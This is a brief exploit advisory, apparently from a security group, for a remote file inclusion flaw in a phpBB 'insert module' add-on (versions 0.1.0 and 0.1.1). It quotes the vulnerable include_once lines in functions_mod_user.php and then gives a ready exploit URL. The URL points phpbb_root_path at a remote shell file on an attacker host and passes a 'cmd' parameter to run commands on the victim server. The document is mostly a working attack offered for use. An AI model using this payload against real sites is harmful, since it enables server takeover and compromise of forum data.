|
$ BiyoSecurity.Org & SecurityWall.Org
$ Script Name : Phpbb insert module
$ versions : 0.1.0 and 0.1.1
$ Risk : High
$ Regard : KorsaN
$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra
$ Vulnerable File : functions_mod_user.php
$ Vulnerable code :
<-- code start -->
include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
$ Exploit :
www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls